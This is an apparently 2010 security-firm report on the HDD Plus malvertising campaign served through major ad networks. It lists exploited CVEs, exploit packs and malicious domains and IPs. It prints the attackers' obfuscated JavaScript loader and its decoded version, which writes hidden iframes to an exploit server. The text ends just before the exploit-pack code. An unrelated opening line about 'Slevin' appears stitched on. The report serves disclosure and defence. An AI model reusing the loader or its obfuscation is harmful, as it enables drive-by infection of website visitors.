We don't know what for parts of this "HDD Plus" operations Slevin is responsible, but we're sure he's involved and chose to tell little of what he knows.

"HDD Plus" malware spread through major ad networks, using malvertising and drive-by download

2010-12-10T11:49:00.000-08:00

(Credits: Wayne Huang, Caleb Sima, Chris Hsiao, NightCola Lin)

Over the past few days, we saw the quick spread of HDD Plus--a malware that (somehow) gets installed on victim computers, and holds the computer hostage by displaying threatening message (that the system is failing), asking you to purchase a license so HDD Plus will fix the problems.

Information on HDD Plus can be found here and here.

We've realized that one of the means for HDD Plus to spread, was via drive-by download malvertising through (at least) DoubleClick and rad.msn.com, which are both the world's largest ad serving platforms.

This is detailed technical report.

Summary

Behavior: Users visit websites that incorporate banner ads from DoubleClick or rad.msn.com, the malicious javascript is served from ADShufffle.com (notice the three f's), starts a drive-by download process and if successful, HDD Plus and other malware are installed into the victim's machine, without having the need to trick the victim into doing anything or clicking on anything. Simply visiting the page infects the visitors.

Known sites affected: Sites that incorporate DoubleClick or rad.msn.com banners, including for example Scout.com (using DoubleClick), realestate.msn.com, msnbc.com (using both), and mail.live.com. We'd like to note here it's very possible that multiple exchanges, besides those listed here, have been serving the fake ADShufffle's ads.

Important dates:

Dec 2nd: Registration of the associated malicious domains

Dec 3rd: HackAlert first detected this drive-by download being served by DoubleClick (2010-12-04T02:18:50+00:00GMT). We were not aware at this time (HackAlert flags too many URLs per day of live Web malware)

Dec 8th: We were requested by our partner, Symantec-VeriSign, to conduct an analysis one some of the affected websites and justify HackAlert's decision to take the VeriSign Trust Seal off from these websites. Some of the websites called into Symantec's customer service line to ask for more information. HackAlert's flaggings were "on-and-off" which raised concerns that we had bugs with HackAlert. Symantec-VeriSign scans all of their Trust Seal customers for web malware and is very serious about the scan quality. They've always been quite strict with our scan quality (accuracy and coverage) and we've been working hard to keep them as our satisfied partner.

On the same day we verified that it was the banner ads from DoubleClick, and replied Symantec-VeriSign. On the same day, believing it was ADShuffle that was providing the malicious banner ad to DoubleClick, we notified Andrea McKee, President to ADShuffle. She replied very quickly to ask for detailed info, which we provided. She quickly pointed out that it was with three f's and so not her company. She said that they really appreciate the detailed info, and that she would quickly inform DoubleClick.

Dec 9th: We reached out to DoubleClick and in less than a few hours time they arranged a meeting with a group of their experts on anti-malvertising and incidence response. We were very surprised and impressed with the speed that DoubleClick acted. We provided details, and DoubleClick said they were already on top of the issue.

At the same time, our CEO Caleb Sima received a private email indicating that mail.live.msn, together with other big websites, were serving drive-by downloads via malvertising. We started to investigate other ad exchanges, because it was apparent that ADShufffle.com was able to trick multiple ad exchanges into serving their malicious javascript. We started to investigate this.

Dec 10th: Private sources provided detailed info to us, and we confirmed ADShufffle.com malvertising through rad.msn.com.

Exploits used:

Initially with DoubleClick:
1) Internet Explorer iepeers (CVE-2010-0806)

Later with DoubleClick and rad.msn.com:
2) JDT: Java Web Start Arbitrary command-line injection (CVE-2010-0886)
3) Adobe Reader and Adobe Acrobat 9 GetIcon (CVE-2009-0927)
4) Microsoft MDAC RDS.Dataspace ActiveX (CVE-2006-0003)
5) Adobe Reader and Acrobat 9.x Doc.media.newPlayer ()
6) Adobe Acrobat and Reader util.printf (CVE-2008-2992)
7) Adobe Reader GetMailInfo (CVE-2007-5659)

Malware installed:
Over the past week, ADShufffle kept on changing the malware. Besides HDD Plus, other types of malware, such as backdoors, have been served. Later in the article we will provide links to our observed binaries.

Exploit packs used:
Primarily a modified version of Eleonore. Neosploit was also used. With neosploit, malicious binaries are obfuscated on-the-fly before being served.

Significant facts:
1. Drive-by download malvertising, visitors infected without having to click
2. Being served by the world's largest ad platforms. Large websites have been affected.
3. Exploits were very well obfuscated, manually.
4. Initial detection rate by antivirus vendors were very low.
5. At the time of writing, the ADShufffle.com group is still actively serving drive-by downloads via their registered domains. In fact, today they have registered yet more domains.

Associated domains and IPs

adshufffle.com (63.247.64.174) (serving javascripts that generates iframes pointing to exploit servers)
acerdse.com, blindry.com, careepi.com, colemuns.com (91.213.217.194) (serving exploits and malware)
ssmmbb.com (91.213.217.193) (serving Java jar exploit)
feudari.com (91.213.217.192) (serving pdf exploit)
searchjewel.org (91.200.242.17) (serving malware)
195.5.161.10 (serving Java jar exploit)
thjlnqbtgdw.com, pbcplifpgdw.com (174.132.254.18) (serving exploits and malware)

Attack details

Illustration 1--DoubleClick ADShufffle drive-by download malvertising

Illustration 2--rad.msn.com ADShufffle drive-by download malvertising

Part 1--DoubleClick case study

We'll walk through DoubleClick's case first. Upon visiting a website working with DoubleClick, for example, Scout.com, and within the HTML served, there would be an DoubleClick ad tag for a 728x90 banner ad:

<SCRIPT LANGUAGE="JavaScript">
<!-- hide from non-JavaScript browsers
document.writeln('<SCRIPT LANGUAGE="JavaScript" SRC="http://ad.doubleclick.net/adj/organicgardening/home;kw=;slot=728x90.1;topic=home;sbtpc=home;tile=1;dcopt=ist;sz=728x90;ord=' + ord + '?" type="text/javascript">');
document.writeln('</SCRIPT>');
// end hide from browsers -->
</SCRIPT>
<noscript><a href="http://ad.doubleclick.net/jump/organicgardening/home;kw=;slot=728x90.1;topic=home;sbtpc=home;tile=1;sz=728x90;ord=123456?" target="_blank"><img src="http://ad.doubleclick.net/ad/organicgardening/home;topic=home;sbtpc=home;tile=1;sz=728x90;ord=123456?" width="728" height="90" border="0" alt="" target="_blank"></a></noscript>

Trying to render this, the browser visits ad.doubleclick.net, and gets the following:

document.write('<script type=\"text/javascript\" src=\"http://this.content.served.by.adshufffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4_D7mmLupb1TWfhr91mfhH0/view.js/?sid=1953243&lpd=${4020322}&ASTPCT=${http://ad.doubleclick.net/click%3Bh%3Dv8/3a6a/3/0/%2a/w%3B233305186%3B0-0%3B0%3B12910146%3B3454-728/90%3B39673254/39691041/1%3B%3B%7Eaopt%3D2/1/7d/1%3B%7Esscs%3D%3f}\"><\/script>');document.write('\n<!-- Begin Interstitial Ad -->');
//PopUnder Power
//Credit notice must stay intact for use.
... script continues...

Getting the javascript from adshufffle.com yields:

var latency='';
var reno1='%78%53%4C%';
var reno2='78%53%4C%78%53%4C%53';
var reno3='%25%4C%4A%63%4C%43%25%4C%57%25';
var reno4='%4C%6D%63%';
var reno5='4C%48';
var reno6='%32%4';
var reno7='C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43';
var reno8='%32%4C%5F%25%4C%4F%6';
var reno9='3%4C%6D%63%4C%25%25%4C%53%63%4C%25%25%4C%42%63%4C%';
var reno10='25%57%4C%48%32%4C%70%32%4C%25%';
var reno11='57%4C%5F%32%4C%25%32%4C%48%32%4C%42%32%4';
var reno12='C%50%32%4C%25%57%4C%';
var reno13='32%32%4C%53%25%4C%25';
var reno14='%25%4C%53%63%4C%25%25%4C%42%63%4C%48%32%4C%63%32%4';
var reno15='C%50%32%4C%53%57%4C%63%57%4C%35%32%4C%53%25%4C%25%';
var reno16='25%4C%5F%32%4C%6D%32%4C%25%25%4C%42%63%4C%57%32%4C%6D%32%4C%43%32%4C%4F%32%4C%4F';
var reno17='%32%4C%5F%32%4C%25%5';
var reno18='7%4C%63%32%4C%63%57%4C%53%25%4C%25%25%4C%53%63%4C%';
var reno19='43%63%4C%25%25%4C%42%63%4C%70%57%4C%35%32%4C%57%32';
var reno20='%4C%43%32%4C%48%32%4C%35%32%4C%53%25%4C%25%25%4C%3';
var reno21='5%63%4C%25%63%4C%57%63%4C%25%25%4C%42%63%4C%35%32%4C%70%57%4C%70%32%4C%43%32%4C%57%57%4C%53%25%4C%25%25%4C%50%63%4C%43%63%4C%48%63%4C%50%63%4C%32%63%4C%53%63%4C%70%63%4C%50%63%4C%70%70%4C%63%63%4C%48%25%4C%48%32%4C%70%32%4C%5F%32%4C%6D%32%4C%32%70%4C%63%63%4C%48%25%4C%25%32%4C%32%70%4C%25%63%4C%48%25%4C%63%57%4C%70%32%4C%25%57%4C%50%32%4C%63%70%4C%70%57%4C%32%32%4C%43%32%4C%57%70%4C%32%70%4C%25%63%4C%48%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%70%57%4C%48%32%4C%57%32%4C%25%57%4C%50%32%4C%70%57%4C%6D%25%4C%57%57%4C%57%57%4C%57%57%4C%32%70%4C%25%63%4C%48%25%4C%32%70%4C%25%63%4C%48%25%4C%50%70%4C%63%63%4C%48%25%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%5F%63%4C%42%63%4C%63%57%4C%63%32%4C%63%57%4C%63%57%4C%6D%57%4C%4A%63%4C%50%63%4C%5F%25%4C%70%32%4C%57%63%4C%5F%25%4C%50%63%4C%5F%25%4C%25%63%4C%42%63%4C%70%57%4C%53%57%4C%5F%32%4C%50%32%4C%6D%57%4C%4A%63%4C%4A%63%4C%50%63%4C%5F%25%4C%50%63%4C%70%63%4C%53%63%4C%50%63%4C%43%63%4C%32%63%4C%43%63%4C%63%63%4C%5F%25%4C%70%63%4C%48%63%4C%25%63%4C%63%63%4C%57%63%4C%32%63%4C%43%63%4C%63%63%4C%4A%63%4C%53%63%4C%43%63%4C%5F%25%4C%35%63%4C%25%63%4C%57%63%4C%42%25%4C%70%63%4C%48%63%4C%70%63%4C%63%63%4C%4A%63%4C%32%63%4C%70%63%4C%50%63%4C%53%63%4C%50%63%4C%43%63%4C%25%63%4C%50%63%4C%4A%63%4C%53%63%4C%4A%63%4C%53%63%4C%42%25%4C%53%63%4C%4A%63%4C%32%63%4C%35%63%4C%50%63%4C%48%63%4C%53%63%4C%63%63%4C%63%63%4C%63%63%4C%25%63%4C%4A%63%4C%57%57%4C%5F%25%4C%78%25%4C%5F%25%4C%53%63%4C%5F%25%4C%63%63%4C%5F%25%4C%50%32%4C%32%63%4C%50%32%4C%63%63%4C%5F%25%4C%35%63%4C%32%57%4C%42%63%4C%35%32%4C%4A%63%4C%4A%32%4C%63%32%4C%43%32%4C%4F%32%4C%63%32%4C%5F%25%4C%70%57%4C%48%32%4C%6D%32%4C%6D%25%4C%4A%32%4C%63%32%4C%43%32%4C%4F%32%4C%63%32%4C%48%32%4C%4F%32%4C%25%32%4C%48%57%4C%5F%32%4C%70%32%4C%6D%25%4C%70%32%4C%50%32%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%42%63%4C%4F%32%4C%25%57%4C%48%57%4C%32%25%4C%53%63%4C%43%63%4C%42%63%4C%35%32%4C%32%25%4C%35%63%4C%25%63%4C%57%63%4C%42%63%4C%57%57%4C%32%25%4C%32%32%4C%57%57%4C%63%57%4C%6D%25%4C%53%63%4C%43%63%4C%35%57%4C%35%63%4C%25%63%4C%57%63%4C%5F%48%4C%70%32%4C%25%57%4C%50%32%4C%63%70%4C%70%57%4C%32%32%4C%43%32%4C%57%70%4C%43%57%4C%50%32%4C%70%32%4C%43%32%4C%4F%32%4C%5F%32%4C%35%70%4C%53%63%4C%50%63%4C%5F%25%4C%70%32%4C%25%57%4C%50%32%4C%63%32%4C%25%57%4C%32%32%4C%43%32%4C%57%32%4C%5F%48%4C%70%57%4C%48%32%4C%57%32%4C%25%57%4C%50%32%4C%70%57%4C%5F%25%4C%48%32%4C%63%32%4C%25%57%4C%48%32%4C%42%32%4C%42%32%4C%5F%32%4C%63%70%4C%57%32%4C%43%32%4C%25%70%4C%50%32%4C%5F%25%4C%25%32%4C%70%32%4C%25%32%4C%5F%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%48%32%4C%4F%32%4C%32%32%4C%32%32%4C%32%32%4C%48%57%4C%35%32%4C%63%57%4C%70%32%4C%50%32%4C%6D%25%4C%43%57%4C%25%32%4C%6D%25%4C%70%32%4C%48%32%4C%32%57%4C%25%57%4C%48%32%4C%63%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%70%57%4C%6D%32%4C%5F%32%4C%63%32%4C%6D%25%4C%63%57%4C%43%32%4C%35%32%4C%70%57%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%42%63%4C%63%32%4C%25%57%4C%63%57%4C%5F%63%4C%53%57%4C%35%32%4C%53%57%4C%6D%25%4C%25%57%4C%48%32%4C%70%32%4C%50%32%4C%5F%32%4C%4F%32%4C%42%25%4C%35%32%4C%63%57%4C%50%32%4C%4F%32%4C%32%32%4C%5F%25%4C%63%57%4C%25%57%4C%48%32%4C%6D%32%4C%6D%32%4C%50%32%4C%25%32%4C%5F%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%48%32%4C%4F%32%4C%32%32%4C%32%32%4C%32%32%4C%48%57%4C%35%32%4C%63%57%4C%70%32%4C%50%32%4C%6D%25%4C%43%57%4C%25%32%4C%6D%25%4C%70%32%4C%48%32%4C%32%57%4C%25%57%4C%48%32%4C%63%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%70%57%4C%6D%32%4C%5F%32%4C%63%32%4C%6D%25%4C%63%57%4C%43%32%4C%35%32%4C%70%57%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%25%25%4C%42%63%4C%63%32%4C%25%57%4C%63%57%4C%53%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%4F%63%4C%57%25%4C%35%25%4C%48%32%4C%70%57%4C%43%32%4C%25%57%4C%57%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%42%32%4C%48%57%4C%63%32%4C%5F%32%4C%70%32%4C%78%53%4C%78%53%4C%42%57%4C%78%53%4C%78%53%4C%78%53%4C%4A%63%4C%43%25%4C%43%25%4C%25%25%4C%48%70%4C%63%63%4C%48%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%5F%25%4C%63%70%4C%63%63%4C%48%25%4C%48%70%4C%63%63%4C%48%25%4C%53%25%4C%57%25%4C%50%63%4C%57%25%4C%42%63%4C%70%57%4C%35%32%4C%57%32%4C%43%32%4C%48%32%4C%35%32%4C%53%25%4C%57%25%4C%50%63%4C%57%25%4C%42%63%4C%35%32%4C%70%57%4C%70%32%4C%43%32%4C%57%57%4C%53%25%4C%57%25%4C%4A%63%4C%6D%32%4C%48%32%4C%70%32%4C%70%32%4C%43%32%4C%35%32%4C%78%63%4C%43%57%4C%70%57%4C%43%32%4C%4F%32%4C%43%32%4C%25%32%4C%43%32%4C%63%57%4C%43%32%4C%32%57%4C%57%25%4C%42%63%4C%48%32%4C%4F%32%4C%43%57%4C%70%57%4C%63%57%4C%53%25%4C%57%25%4C%63%63%4C%70%63%4C%25%63%4C%63%63%4C%48%63%4C%43%63%4C%50%63%4C%42%63%4C%70%32%4C%43%32%4C%5F%63%4C%53%57%4C%35%32%4C%53%57%4C%6D%25%4C%48%32%4C%5F%48%4C%63%57%4C%78%32%4C%5F%48%4C%63%57%4C%70%57%4C%50%32%4C%70%57%4C%63%57%4C%5F%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%48%32%4C%4F%32%4C%32%32%4C%32%32%4C%32%32%4C%48%57%4C%35%32%4C%63%57%4C%70%32%4C%50%32%4C%6D%25%4C%43%57%4C%25%32%4C%6D%25%4C%70%32%4C%48%32%4C%32%57%4C%25%57%4C%48%32%4C%63%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%70%57%4C%6D%32%4C%5F%32%4C%63%32%4C%6D%25%4C%63%57%4C%43%32%4C%35%32%4C%70%57%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%57%25%4C%42%63%4C%63%32%4C%25%57%4C%63%57%4C%53%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%63%70%4C%63%63%4C%48%25%4C%25%25%4C%35%25%4C%48%32%4C%53%57%4C%50%32%4C%63%32%4C%63%57%4C%48%32%4C%6D%32%4C%48%57%4C%35%25%4C%48%32%4C%70%57%4C%43%32%4C%25%57%4C%57%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%42%32%4C%48%57%4C%63%32%4C%5F%32%4C%70%32%4C%78%53%4C%78%53%4C%53%25%4C%4A%63%4C%43%25%4C%43%25%4C%25%25%4C%48%70%4C%63%63%4C%48%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%5F%25%4C%63%70%4C%63%63%4C%48%25%4C%48%70%4C%63%63%4C%48%25%4C%53%25%4C%57%25%4C%50%63%4C%57%25%4C%42%63%4C%70%57%4C%35%32%4C%57%32%4C%43%32%4C%48%32%4C%35%32%4C%53%25%4C%57%25%4C%50%63%4C%57%25%4C%42%63%4C%35%32%4C%70%57%4C%70%32%4C%43%32%4C%57%57%4C%53%25%4C%57%25%4C%4A%63%4C%6D%32%4C%48%32%4C%70%32%4C%70%32%4C%43%32%4C%35%32%4C%78%63%4C%43%57%4C%70%57%4C%43%32%4C%4F%32%4C%43%32%4C%25%32%4C%43%32%4C%63%57%4C%43%32%4C%32%57%4C%57%25%4C%42%63%4C%48%32%4C%4F%32%4C%43%57%4C%70%57%4C%63%57%4C%53%25%4C%57%25%4C%70%57%4C%5F%32%4C%5F%32%4C%25%57%4C%42%63%4C%48%57%4C%32%25%4C%70%32%4C%32%63%4C%32%32%4C%50%63%4C%50%63%4C%35%63%4C%57%63%4C%48%63%4C%70%63%4C%57%63%4C%43%63%4C%63%63%4C%70%32%4C%57%63%4C%70%32%4C%43%63%4C%35%63%4C%63%32%4C%63%63%4C%25%32%4C%70%32%4C%63%32%4C%63%63%4C%48%63%4C%48%63%4C%53%63%4C%70%32%4C%63%63%4C%43%63%4C%48%32%4C%25%63%4C%43%63%4C%42%63%4C%43%57%4C%48%32%4C%4A%32%4C%5F%63%4C%53%57%4C%35%32%4C%53%57%4C%6D%25%4C%57%57%4C%5F%32%4C%35%32%4C%63%57%4C%5F%25%4C%57%32%4C%48%32%4C%63%57%4C%53%57%4C%48%57%4C%53%57%4C%5F%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%63%57%4C%6D%32%4C%48%57%4C%42%32%4C%48%32%4C%4F%32%4C%5F%32%4C%63%32%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%57%25%4C%42%63%4C%63%32%4C%25%57%4C%63%57%4C%53%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%63%70%4C%63%63%4C%48%25%4C%25%25%4C%35%25%4C%48%32%4C%53%57%4C%50%32%4C%63%32%4C%63%57%4C%48%32%4C%6D%32%4C%48%57%4C%35%25%4C%48%32%4C%70%57%4C%43%32%4C%25%57%4C%57%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%42%32%4C%48%57%4C%63%32%4C%5F%32%4C%70%32%4C%78%53%4C%43%53%4C%43%53%4C%78%53%4C%78%53%4C%4A%57%4C%53%25%4C%53%25%4C%48%32%4C%63%57%4C%4F%32%4C%48%32%4C%53%25%4C%53%25%4C%42%57%4C%78%53%4C%4A%63%4C%43%25%4C%43%25%4C%25%25%4C%48%70%4C%63%63%4C%48%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%5F%25%4C%63%70%4C%63%63%4C%48%25%4C%48%70%4C%63%63%4C%48%25%4C%53%25%4C%53%25%4C%57%25%4C%53%63%4C%57%25%4C%42%63%4C%70%57%4C%35%32%4C%57%32%4C%43%32%4C%48%32%4C%35%32%4C%53%25%4C%57%25%4C%53%63%4C%57%25%4C%42%63%4C%35%32%4C%70%57%4C%70%32%4C%43%32%4C%57%57%4C%53%25%4C%57%25%4C%4A%63%4C%6D%32%4C%48%32%4C%70%32%4C%70%32%4C%43%32%4C%35%32%4C%78%63%4C%43%57%4C%70%57%4C%43%32%4C%4F%32%4C%43%32%4C%25%32%4C%43%32%4C%63%57%4C%43%32%4C%32%57%4C%57%25%4C%42%63%4C%48%32%4C%4F%32%4C%43%57%4C%70%57%4C%63%57%4C%53%25%4C%57%25%4C%50%63%4C%42%63%4C%48%32%4C%32%25%4C%53%63%4C%42%63%4C%63%57%4C%32%25%4C%63%63%4C%70%63%4C%25%63%4C%63%63%4C%48%63%4C%43%63%4C%50%63%4C%42%63%4C%70%32%4C%43%32%4C%5F%63%4C%53%57%4C%35%32%4C%53%57%4C%6D%25%4C%70%57%4C%5F%48%4C%63%57%4C%70%57%4C%50%32%4C%70%57%4C%63%57%4C%5F%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%48%32%4C%4F%32%4C%32%32%4C%32%32%4C%32%32%4C%48%57%4C%35%32%4C%63%57%4C%70%32%4C%50%32%4C%6D%25%4C%43%57%4C%25%32%4C%6D%25%4C%70%32%4C%48%32%4C%32%57%4C%25%57%4C%48%32%4C%63%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%70%57%4C%6D%32%4C%5F%32%4C%63%32%4C%6D%25%4C%63%57%4C%43%32%4C%35%32%4C%70%57%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%57%25%4C%42%63%4C%63%32%4C%25%57%4C%63%57%4C%53%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%63%70%4C%63%63%4C%48%25%4C%25%25%4C%35%25%4C%48%32%4C%53%57%4C%50%32%4C%63%32%4C%63%57%4C%48%32%4C%6D%32%4C%48%57%4C%35%25%4C%48%32%4C%70%57%4C%43%32%4C%25%57%4C%57%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%42%32%4C%48%57%4C%63%32%4C%5F%32%4C%70%32%4C%78%53%4C%4A%57%4C%53%25%4C%43%25%4C%53%25%4C%4F%32%4C%4F%32%4C%48%57%4C%6D%32%4C%53%25%4C%42%63%4C%50%25%4C%53%25%4C%35%32%4C%63%32%4C%70%57%4C%42%32%4C%53%25%4C%35%25%4C%53%25%4C%32%32%4C%43%32%4C%78%53%4C%78%53%4C%78%53%4C%78%53%4C%4A%63%4C%43%25%4C%4F%32%4C%42%32%4C%70%57%4C%63%32%4C%43%32%4C%70%57%4C%50%32%4C%70%57%4C%63%57%4C%35%25%4C%35%32%4C%63%32%4C%70%57%4C%50%32%4C%42%32%4C%6D%25%4C%70%57%4C%5F%48%4C%4F%32%4C%4F%32%4C%50%32%4C%53%25%4C%42%63%4C%53%25%4C%35%32%4C%63%32%4C%70%57%4C%42%32%4C%53%25%4C%25%57%4C%50%32%4C%32%57%4C%78%53%4C%4A%63%4C%25%25%4C%25%25%4C%53%25%4C%42%63%4C%53%25%4C%70%57%4C%5F%48%4C%4F%32%4C%4F%32%4C%50%32%4C%53%25%4C%25%57%4C%50%32%4C%32%57%4C%78%53%4C%78%53%4C%4A%63%4C%43%25%4C%53%63%4C%32%63%4C%53%25%4C%78%25%4C%53%25%4C%53%63%4C%32%63%4C%53%25%4C%78%25%4C%53%25%4C%53%63%4C%53%63%4C%53%63%4C%50%63%4C%35%25%4C%53%25%4C%5F%25%4C%53%25%4C%43%25%4C%43%25%4C%43%25%4C%50%63%4C%42%25%4C%43%25%4C%25%25%4C%53%25%4C%25%25%4C%35%25%4C%32%32%4C%5F%70%4C%35%57%4C%48%32%4C%70%32%4C%6D%32%4C%43%70%4C%70%57%4C%63%57%4C%50%32%4C%4F%32%4C%6D%25%4C%43%25%4C%35%25%4C%57%32%4C%6D%32%4C%43%32%4C%25%57%4C%70%57%4C%63%48%4C%70%48%4C%42%70%4C%57%70%4C%5F%32%4C%70%57%4C%6D%25%4C%43%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%50%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%43%25%4C%35%25%4C%25%57%4C%50%32%4C%48%32%4C%43%48%4C%4F%32%4C%4F%32%4C%48%57%4C%32%70%4C%70%57%4C%48%32%4C%57%32%4C%6D%25%4C%43%25%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%53%25%4C%4F%25%4C%53%63%4C%35%25%4C%57%32%4C%6D%32%4C%43%32%4C%25%57%4C%70%57%4C%63%57%4C%25%32%4C%48%57%4C%63%57%4C%6D%25%4C%43%25%4C%35%25%4C%57%32%4C%6D%32%4C%43%32%4C%25%57%4C%70%57%4C%63%48%4C%70%48%4C%42%70%4C%57%70%4C%5F%32%4C%70%57%4C%6D%25%4C%43%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%50%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%43%25%4C%35%25%4C%25%57%4C%50%32%4C%48%32%4C%43%48%4C%4F%32%4C%4F%32%4C%48%57%4C%32%70%4C%70%57%4C%48%32%4C%57%32%4C%6D%25%4C%43%25%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%53%25%4C%42%25%4C%53%25%4C%43%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%50%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%43%25%4C%35%25%4C%25%57%4C%50%32%4C%48%32%4C%43%48%4C%4F%32%4C%4F%32%4C%48%57%4C%32%70%4C%70%57%4C%48%32%4C%57%32%4C%6D%25%4C%43%25%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%35%25%4C%53%25%4C%42%63%4C%53%25%4C%4F%32%4C%42%32%4C%70%57%4C%63%32%4C%43%32%4C%70%57%4C%50%32%4C%70%57%4C%63%57%4C%78%53%4C';
latency=reno1+reno2+reno3+reno4+reno5+reno6;
latency=latency+reno7+reno8+reno9+reno10+reno11+reno12+reno13;
latency=latency+reno14+reno15+reno16+reno17+reno18+reno19+reno20+reno21;

latency=unescape(latency);

var nerostrd=latency;
var i=nerostrd.length;
i=i-1;
var jamdv='';
for (var x = i; x >=0; x--)
{
jamdv=jamdv+nerostrd.charAt(x);
}
latency=jamdv;

var plemoza="012345"+"6789abcde"+"fghijklmn"+"opqrstuvwx"+"yzABCDEFGHIJ"+"KLMNOPQ"+"RSTUVWXYZ/.:_-?&=%";
var stroninfl="SP%cpH2W5C"+"83fEX:1r"+"jF9AQdM"+"lKi/sk4GuvtxJOB"+"m_U.Nq"+"zY7aw&nhgZo"+"VT=0IbRDye?6-L";


var fallingms="";
var rttcp;
var ferrana;
for(rttcp=0;rttcp<latency.length;rttcp++)
{
ferrana=stroninfl.indexOf(latency.charAt(rttcp));
var konterrap=1-2;
if(ferrana>konterrap)
{
fallingms+=plemoza.charAt(ferrana);
}
}
eval(unescape(fallingms));

The above obfuscated javascript decodes to:

statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);

var all_t = "";
var mtch = all_t.match(statictml);

if ( mtch != null ) {
document.write(unescape("%3Ciframe src='http://this.content.served.by.adshufffle.com/stats_t.php?id=1953243&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
document.write(unescape("%3Ciframe src='http://colemuns.com/pupseg/show.php?key=92e93d0553cdb3c89d7d397457811f6d&u=root' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
document.write(unescape("%3Ciframe src='http://this.content.served.by.adshufffle.com/stats_js_e.php?id=1953243' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
}

document.write('<iframe src="http://this.content.served.by.adshufffle.com/banners/flash-loader.php?src=http://this.content.served.by.adshufffle.com/bdb/aBigCommerce/target_gifrcard/10HolidayGiftCard_728x90.swf&w=728&h=90&url=http://ad.doubleclick.net/click;h=v8/3a6a/3/0/*/w;233305186;0-0;0;12910146;3454-728/90;39673254/39691041/1;;~aopt=2/1/7d/1;~sscs=?http%3A%2F%2Fwww.target.com%2FGiftCards%2Fb%3Fnode%3D14061591" width="728" height="90" scrolling="no" hspace="0" frameborder="0"></iframe>');

In the above script, colemuns.com/pubseg/show.php is where the exploit is. The all_t mechanism checks for the visitor's timezone and has the ability to serve particular iframes depending on the timezone; this isn't used here.
http://this.content.served.by.adshufffle.com/bdb/aBigCommerce/target_gifrcard/10HolidayGiftCard_728x90.swf is the actual banner that gets displayed, which is copied from Target:

Here, acerdse.com, blindry.com, careepi.com, and colemuns.com, which all resolve to the same IP 91.213.217.194, have been used interchangeably to serve the exploit. The exploits are served using a derived version of the Eleonore exploit pack. Code is as follows:

